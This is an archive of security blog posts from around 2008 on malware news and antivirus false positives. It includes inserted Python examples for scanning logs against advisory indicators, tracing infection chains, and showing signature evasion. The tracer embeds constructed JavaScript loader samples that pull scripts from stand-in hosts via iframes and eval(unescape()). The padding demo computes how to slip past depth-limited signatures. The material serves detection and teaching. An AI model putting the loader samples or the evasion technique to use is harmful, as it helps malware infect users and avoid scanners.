Archive for Malware
Author: Dave Lewis
February 7, 2008 at 11:32 am · Filed under Malware
I tend to get a little grumpy with antivirus products these days. Now, before I type another word, all of you sales folks from av vendors, this is not an invitation to beat my door down.
Today brought a new bit of fun. When loading up my Google.ca search page I was presented with a "virus found" warning.
Crap.Flippin.Crap
So, I pull the cable and dig into what could be the culprit. Hmmm, nothing there. Nope, nothing over there. OK, this is weird. Called Myrcurial. Could he see the same behaviour? Nope.
Sigh. (a pause) No. Not again.
The file in question? http://www.google.ca/logos/lunarnewyear08.gif
The file causing the problem was the title image on Google’s home page.
Oh FFS.
Google 1, Heuristics 0.
Kung Hei Fat Choi.
Tags: False Google Malware, Kung Hei Fat Choi
Author: Dave Lewis
January 28, 2008 at 9:52 am · Filed under Malware
OK, so I must admit I'm starting to become more annoyed with antivirus vendors as the days go on. Today the vendor of choice on my day-job computer decided to catch the "malicious code" I had on my system.
Wunderbar!
Wait, wait…no. Last time I checked, OllyDbg is not a trojan. It seems my AV client is getting dumber by the day. More and more the AV is "catching" shadows on the sidewalk. It sees what "might" be malicious code and sounds the alarm. But, time and again, it is a legitimate file with no virus/trojan/remailer/et cetera to be found. And I am getting tired of it. Every time one of these false alarms is sounded, a triage exercise is initiated, followed by the ensuing investigation. All of this takes time and, well, let's be honest, money. The costs of these types of investigations are mounting and I'm getting a little tired of it.
What’s your malware detection client of choice and why? Care to share?
[UPDATE] Feb 6, 2008 Billy Hoffman has noticed some interesting behaviour as well.
Tags: Antivirus, Malware, False Positives
Author: Dave Lewis
January 21, 2008 at 7:39 am · Filed under Malware
This morning I see that the malicious software purveyors are still in fine form. It would be nice if they would take a weekend off (or longer, much longer). The UK government CERT (GovCertUK) put out an alert at the end of last week regarding a domain originating from the Hotfresh ISP in Hong Kong that is distributing malware. This seems to have first appeared on the 15th of this month. No word at this point as to the nature of the malicious code or whether AV vendors have detection available for it.
From Gov CertUK:
GovCertUK have detected a number of systems downloading malicious software from the IP address 58.65.238.59. The malware can be detected by analysing web traffic logs for outbound traffic to this IP address. Evidence of the IP address 58.65.238.59 within web traffic logs may indicate an infected computer on the network. Other identifying features of this malware include:
•On occasion the IP address may resolve to the domain name of dorifora(dot)com.
•The HTTP GET request to the IP/domain in question will not have an initial referrer listed.
•Once the malware is present on the network, it beacons out to the domain here4search(dot)biz – this domain may also be present within the web logs.
GovCertUK recommend that the IP address 58.65.238.59 is blocked on the network as well as the domains dorifora(dot)com and here4search(dot)biz.
GovCertUK would like to hear from anyone that discovers evidence of this malware on their system. GovCertUK can be contacted on the details provided at the end of this advisory.
Check your logs for outbound traffic to the aforementioned IP address.
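The log check the advisory describes, as an added example (not part of the advisory or the original post): the IP, the two domains and the missing-referrer detail are taken straight from the GovCertUK text, while the combined-log line format, the sample lines and the function names are constructed here for illustration. Proxy or web-server logs in another layout would need only the regular expression changed.

```python
"""Scan web-proxy logs for the indicators in the GovCertUK advisory.

Added example: indicators come from the advisory text; the log format,
sample lines and function names are constructed for this illustration.
"""
import re
from collections import defaultdict

# Indicators lifted from the advisory.
IOC_IPS = {"58.65.238.59"}
IOC_DOMAINS = {"dorifora.com", "here4search.biz"}

# Combined-log style line (constructed format):
# client - - [timestamp] "METHOD URL PROTO" status bytes "referrer"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referrer>[^"]*)"'
)
HOST_RE = re.compile(r'^[a-z]+://(?P<host>[^/:]+)')


def host_of(url):
    """Pull the host portion out of an absolute URL ('' if it has none)."""
    m = HOST_RE.match(url)
    return m.group("host").lower() if m else ""


def matches_ioc(host):
    """True if host is the advisory IP, one of its domains, or a subdomain of them."""
    if host in IOC_IPS:
        return True
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def scan_log(lines):
    """Return {client_ip: [(matched_host, referrer_missing), ...]} for IOC hits.

    referrer_missing is recorded because the advisory notes the initial GET
    carries no referrer; a hit with no referrer is the stronger signal.
    """
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        host = host_of(m.group("url"))
        if matches_ioc(host):
            no_ref = m.group("referrer") in ("", "-")
            hits[m.group("client")].append((host, no_ref))
    return dict(hits)


# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.7 - - [15/Jan/2008:09:12:01 +0000] "GET http://58.65.238.59/x.exe HTTP/1.1" 200 51200 "-"',
    '10.0.0.7 - - [15/Jan/2008:09:15:44 +0000] "GET http://here4search.biz/b.php?id=1 HTTP/1.1" 200 312 "-"',
    '10.0.0.9 - - [15/Jan/2008:09:20:10 +0000] "GET http://www.google.ca/ HTTP/1.1" 200 6000 "-"',
    '10.0.0.12 - - [15/Jan/2008:10:01:00 +0000] "GET http://www.dorifora.com/ HTTP/1.1" 200 900 "http://example.test/"',
    "this line is not a log entry",
]

if __name__ == "__main__":
    for client, events in scan_log(SAMPLE_LOG).items():
        for host, no_ref in events:
            flag = "no referrer" if no_ref else "referrer present"
            print(f"{client} -> {host} ({flag})")
```

Run over the constructed lines, 10.0.0.7 is reported twice (the download host and the beacon domain, both without a referrer) and 10.0.0.12 once for a dorifora.com subdomain; the Google line and the junk line are ignored.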
(thx fuzzE1 for the tip)
Article Link (.pdf)
Tags: GovCertUK, dorifora, searchmeup, here4search, Malware, Trojan
Author: Dave Lewis
January 14, 2008 at 8:35 am · Filed under Crime, Malware
A new toolkit has been released in underground circles, according to the folks at Finjan Inc., who have been keeping an eye on the spreading crimeware. The new software has spread to more than 10,000 sites in the past few weeks. The JavaScript-based malware is generated dynamically and changes each time it is accessed in an effort to avoid detection.
Loverly.
From the press release:
Malicious Code Research Center (MCRC) has identified yet another significant new web attack — the latest in a genre of crimeware that threatens to turn highly trusted web sites into insidious traps for unwary visitors. More than 10,000 websites in the US were infected in December by this latest malware. The attack, which Finjan has designated “random js toolkit,” is an extremely elusive crimeware Trojan that infects an end user’s machine and sends data from the machine via the Internet to the Trojan’s “master”, a cybercriminal. Data stolen by the Trojan can include documents, passwords, surfing habits, or any other sensitive information of interest to the criminal.
For the rest of the story follow the link.
Article Link
Tags: Malware, Crimeware, Crime Toolkit, Random JS Toolkit
Author: Dave Lewis
January 12, 2008 at 6:34 pm · Filed under Malware
Ouch. MySpace is back in the news and not in a pleasant light. It appears that some hackers were leveraging the popular social networking site to distribute malware. The trojan software in question is a fake Microsoft update.
From PC World:
Web surfers are presented with what appears to be a popup window advising them to download the latest version of Microsoft’s Windows Malicious Software Removal Tool, which was just released this Tuesday. This software is distributed by Microsoft to help Windows users rid their systems of malware.
In reality, the popup window is just part of a larger image that takes up most of the computer screen. If the user clicks anywhere on this image, his computer will then begin to download the Trojan program.
The Trojan, known as TFactory, is a well-known piece of code that has been used by criminals for well over a year, according to Dave Marcus, a security research manager with McAfee.
More reason to be sure that your antivirus software is up to date and your patches are applied…from the source.
Article Link
Tags: MySpace Trojan, MySpace, MySpace Malware, TFactory
Author: Dave Lewis
January 8, 2008 at 5:19 pm · Filed under Exploit, Malware
OK, so now that I have my home machine I can dig into the anatomy of the uc8010[dot]com hack’s javascript.
First off, after a site has been infected, a web user who surfs to a hosted page has a JavaScript file, typically named "0.js", executed on an unprotected system; it also sets a cookie. This then calls an iframe and another JavaScript file that (in the instance I tested) was called "w.js". It is this file that contains the "eval" call that launches the exploit.
This second file (w.js) would launch another iframe that would call a counter from cnzz[dot]com, as well as calling a third JavaScript file called "007.js".
Smart ass.
This last JavaScript file would create another iframe that would call a page from mywordmyspace[dot]cn. This would in turn return a script file that called another counter from a site called 51yes[dot]com.
The first counter I presume to announce to the hacker that a successful breach occurred and the second to indicate a payload delivered.
This is by no means an exhaustive test. I’ve only started teasing it apart.
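A static tracer for the kind of iframe/script chain described above, as an added example. This is not the uc8010[dot]com code and does not reproduce it: the three stages below are constructed stand-ins with the same shape (cookie set, hidden iframe, a second script, an eval over an unescape()'d string, a counter call), and every hostname and path is hypothetical. In practice the bodies would come from captured files rather than the inline dictionary, and the "fetch" argument is just a lookup so the whole thing runs offline.

```python
"""Trace an iframe/script redirection chain statically, stage by stage.

Added example, not the original malware: the samples are constructed stand-ins
with hypothetical hosts. Each stage is decoded (unescape() literals expanded),
its iframe/script references extracted, and the walk continues depth-first.
"""
import re
from urllib.parse import unquote, urljoin

IFRAME_SRC = re.compile(r'<iframe[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
SCRIPT_SRC = re.compile(r'<script[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
UNESCAPE = re.compile(r'unescape\(\s*["\']([^"\']*)["\']\s*\)')
EVAL_CALL = re.compile(r'\beval\s*\(')
SET_COOKIE = re.compile(r'document\.cookie\s*=')


def decode_layer(js):
    """Expand unescape("...") literals so tags hidden inside them become visible."""
    return UNESCAPE.sub(lambda m: '"' + unquote(m.group(1)) + '"', js)


def extract_refs(js, base):
    """Return [(kind, absolute_url)] for each iframe/script src in the decoded body."""
    body = decode_layer(js)
    refs = [("iframe", urljoin(base, u)) for u in IFRAME_SRC.findall(body)]
    refs += [("script", urljoin(base, u)) for u in SCRIPT_SRC.findall(body)]
    return refs


def walk_chain(start, fetch):
    """Follow every reference from start depth-first; fetch(url) returns a body or None.

    Returns an ordered list of dicts: url, kind, whether it calls eval, whether it
    sets a cookie, and the references it makes. Unfetchable URLs are still listed
    (leaf nodes) so counters and iframe targets show up in the chain.
    """
    seen, chain = set(), []

    def visit(url, kind):
        if url in seen:  # guard against loops between stages
            return
        seen.add(url)
        body = fetch(url)
        info = {"url": url, "kind": kind, "eval": False, "cookie": False, "refs": []}
        if body is not None:
            decoded = decode_layer(body)
            info["eval"] = bool(EVAL_CALL.search(decoded))
            info["cookie"] = bool(SET_COOKIE.search(decoded))
            info["refs"] = extract_refs(body, url)
        chain.append(info)
        for k, u in info["refs"]:
            visit(u, k)

    visit(start, "script")
    return chain


# Constructed samples (hypothetical hosts), shaped like the chain in the post.
SAMPLES = {
    "http://evil.test/0.js":
        'document.cookie="seen=1";'
        'document.write(\'<iframe src="http://evil.test/w.htm" width=0 height=0></iframe>\');'
        'document.write(\'<script src="http://evil.test/w.js"></script>\');',
    "http://evil.test/w.js":
        'var s=unescape("%3Ciframe%20src%3D%22http%3A//counter1.test/c.gif%22%3E%3C/iframe%3E");'
        'document.write(s);'
        'eval(unescape("document.write(%27%3Cscript%20src%3D%22http%3A//evil.test/007.js%22%3E%3C/script%3E%27)"));',
    "http://evil.test/007.js":
        'document.write(\'<iframe src="http://stage3.test/x.htm"></iframe>\');',
    "http://stage3.test/x.htm":
        '<html><script src="http://counter2.test/hit.js"></script></html>',
}

if __name__ == "__main__":
    for node in walk_chain("http://evil.test/0.js", SAMPLES.get):
        flags = [f for f, on in (("eval", node["eval"]), ("cookie", node["cookie"])) if on]
        print(f"{node['kind']:6} {node['url']} {' '.join(flags)}")
```

On the constructed samples the walk lists seven URLs in load order, marks 0.js as the cookie setter, w.js as the stage that calls eval, and surfaces both counter hosts even though their bodies are never fetched.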
Tags: uc8010, SQL Hack, Javascript, iframe
Author: Dave Lewis
December 28, 2007 at 8:59 am · Filed under Malware
The holiday has dragged the Storm Worm back out for some more "smashy, smashy". If you receive an email like the one above, which arrived in our media mailbox this morning, do not click on it. That might seem self-evident to some, but this malware continues to spread for a reason. A couple of the domains being used to spread the malware are happycards2008.com and newyearcards2008.com. This time around the creators of the Storm Worm have added a rootkit in an effort to avoid detection and to distribute the workload.
From Computer World:
Fortunately, said Giuliani, the rootkit is relatively old, and thus detectable by at least some security software. Neither is the move by Storm’s makers to hide its components and operations from anti-virus programs a new thing: the Trojan began using rootkits months ago.
Giuliani also wondered why the domains hosting the Trojan had not been taken down. “If the attack is currently known and security companies are updating their software, why are these fake domains still active?” he asked in a post to the Prevx company blog. “If servers behind [these] sites are constantly changing so that it would be impossible to shut them down, these servers are reached by four well-known domains. Why, after four days, hasn’t anyone successfully taken these domains down?”
That’s an easy one to answer. It’s the holiday season. No one home.
I didn’t say it was a good answer.
Article Link
Tags: Storm Worm, Holiday Email Malware
Author: Dave Lewis
December 21, 2007 at 10:34 am · Filed under Malware
Tell us something we didn’t know. This article comes to us from the Register UK:
Antivirus software is getting worse at protecting users from new threats, according to two reports which found malware authors are getting better at disguising their creations.
German computer magazine c’t studied 17 antivirus programs and exposed them to completely new samples of malware. What they found wasn’t encouraging. Detection rates sank to 20-30 per cent, from 40-50 per cent in a similar test last year.
The c’t researchers also created variants of known viruses and found that virtually all of the scanners missed at least some of them.
The fact that the variants could get past a lot of the filters doesn't really surprise me. In a lot of ways this is expected (although not welcome) behaviour. Most scanning is based on signatures. If you pad one of the payloads to be longer or shorter, it is very possible that it will go undetected. This is exactly why Code Red was able to spread undetected by intrusion detection systems and AV alike in the beginning: by adding 100 bytes to the payload it outstripped the signature. Another problem that this testing showed is that the heuristics in a lot of the vendor offerings are immature at this point. I have seen enough instances of false positives in several vendor products to come to that conclusion.
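A toy model of the padding problem described above, as an added example. Nothing here reproduces Code Red, the c't test samples or any vendor's real signature: the "marker" bytes, the clean carrier around them, the three signature styles and the 100-byte padding are all constructed to show how a whole-file hash and a depth-limited pattern search miss a padded variant that a full-content search still catches, and at what padding length the depth-limited check first fails.

```python
"""Why a padded variant slips past hash and depth-limited signatures.

Added example with constructed data: MARKER stands in for an exploit string,
ORIGINAL is the sample the signature was written for, and PADDED is the
variant with 100 bytes prepended. Not a model of any real worm or rule.
"""
import hashlib

MARKER = b"GET /vuln.ida?" + b"X" * 19            # constructed 33-byte marker
ORIGINAL = MARKER + b"\r\nHost: victim\r\n"
PADDED = b"N" * 100 + ORIGINAL                    # variant: marker pushed 100 bytes in


def sig_hash(sample, known_digest):
    """Whole-file hash: matches only a byte-identical sample."""
    return hashlib.sha256(sample).digest() == known_digest


def sig_depth_limited(sample, pattern, depth):
    """Pattern search over the first `depth` bytes only, like an inspection window."""
    return pattern in sample[:depth]


def sig_full_scan(sample, pattern):
    """Pattern search over the whole sample (slower, but position-independent)."""
    return pattern in sample


def evaluate(sample, depth=64):
    """Run all three signature styles against one sample."""
    known = hashlib.sha256(ORIGINAL).digest()
    return {
        "hash": sig_hash(sample, known),
        "depth": sig_depth_limited(sample, MARKER, depth),
        "full": sig_full_scan(sample, MARKER),
    }


def first_evading_pad(depth, marker=MARKER, max_pad=1024):
    """Smallest amount of leading padding that defeats the depth-limited signature."""
    for pad in range(max_pad + 1):
        if not sig_depth_limited(b"N" * pad + ORIGINAL, marker, depth):
            return pad
    return None


if __name__ == "__main__":
    for name, sample in (("original", ORIGINAL), ("padded+100", PADDED)):
        print(name, evaluate(sample))
    print("depth 64 first misses at pad =", first_evading_pad(64))
```

With a 64-byte window and a 33-byte marker, the original sample trips all three checks, the padded variant trips only the full scan, and the depth-limited check starts missing as soon as 32 bytes of padding push the marker's tail past the window.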
It won’t take long before the vendors are crying foul. Lord knows that Chinese users won’t find much sympathy for the AV crowd.
Hope springs. Current AV is still better than the alternative.
On a side note, I know a user that refuses to use anti-virus of any kind. No firewall et cetera. He maintains that it is a waste of money. Then his computer invariably slowwws down. So, what does he do? Get AV? Nope. He THROWS THE COMPUTER OUT! That works for me as I plan to be in front of his house when he pitches his tricked out machine with dual core processors and 4 GB of RAM. Oh yeah, and he’ll pitch the monitor as well. A 21″ flat screen.
Free is good.
Article Link
Tags: Anti-Virus, Antivirus, Malware, Heuristics, c’t
Author: Dave Lewis
December 21, 2007 at 7:09 am · Filed under Crime, Malware
From Kaspersky’s Viruslist.com:
Today Nikolay Patrushev, head of the Federal Security Services, announced the results of the measures taken to combat cyber crime in 2007.
Among other information, it was announced that it had been established who was the author of the notorious Pinch Trojan - two Russian virus writers called Ermishkin and Farkhutdinov. The investigation will soon be completed and taken to court.
It’s well known that Pinch is one of the most popular Trojan programs with Russian malicious users. The Trojan makes it possible to steal email, ICQ and other account data, including that for network services and applications. The authors of this program, also known as Damrai and Scratch, used Pinch to build a criminal industry.
Anyone who wants can order a customized version of the Trojan, and also get ‘technical support’ from the authors of the program. Russian hacker forums were flooded with advertisements for this ’service’.
I wonder if they will be able to ferret out other writers such as the creators of Mpack?
Article Link
Tags: Pinch, Pinch Trojan, Malware, Russian Police
Author: Dave Lewis
December 17, 2007 at 11:13 am · Filed under Crime, Malware
Here is an interesting write up from C|Net on the malware underground.
From C|Net:
“Over the years, the criminal elements, the ones who are making money, making millions out of all this online crime, are just getting stronger and stronger. I don’t think we are really winning this war.”
As director of antivirus research for F-Secure, you might expect Mikko Hypponen to overplay the seriousness of the situation. But according to the Finnish company, during 2007 the number of samples of malicious code on its database doubled, having taken 20 years to reach the size it was at the beginning of this year.
There seems to be some serious evidence then for the idea of an evolution from hacking and virus writing for fun to creating malicious code for profit. Security experts are increasingly pointing to the existence of a “black” or “shadow” cybereconomy, where malware services are sold online using the same kinds of development methods and guarantees given by legitimate software vendors.
It is difficult to establish exactly how organized this malware economy is but, according to David Marcus, security research manager at McAfee Avert Labs, it’s relatively straightforward to buy not only the modules to build malware, but also the support services that go with it.
Article Link